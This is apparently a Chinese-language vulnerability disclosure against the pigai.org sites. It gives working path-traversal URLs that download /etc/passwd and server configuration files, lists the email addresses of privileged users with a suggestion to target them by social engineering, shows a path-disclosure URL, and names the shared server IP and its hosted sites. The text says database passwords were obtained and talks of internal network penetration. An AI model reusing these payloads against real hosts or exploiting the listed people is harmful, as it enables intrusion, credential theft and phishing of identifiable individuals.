http://bec.pigai.org/?core-dl&f=/../../../../../../../etc/passwd
任意文件下载
一个一个文件的读,找到数据库
此信息先留下 内网渗透。
接着找
include "global.inc.php";
里面说是特权用户。
http://bec.pigai.org/?core-dl&f=/lib/global.inc.php
#"liwei@cikuu.com",
"peadmin",
"651275983@qq.com",
"bambilun@163.com",
"limin@126.com",
"284272284@qq.com",
"frank_tsai@126.com",
"bec@pigai.org"
这些是特权用户。那就是高权限用户吧。。可以用来社工一下。
再继续查。发现这个IP 下面有5个网站。。那就一个一个的来读
暴路径 :http://wiki.pigai.org/wp-includes/registration-functions.php
得到网站路径/data2t/app/mediawiki-1.24.1/wordpress/wp-includes/registration-functions.php
(貌似这个网站之前有漏洞整改了,换成了wordpress还是难逃躺着也中枪)
然后下载获得wiki.pigai.org 数据库配置文件:
得到数据库密码。
这样说的话那 117.79.131.118上面的主机基本都能猜出个大概来了 http://tongti.pigai.org http://blir.pigai.org 涉及到5个网站(包括一个词语库)。危害还是很大的。
这只是第一弹,只说了这些危害。还有利用与更多的请看#2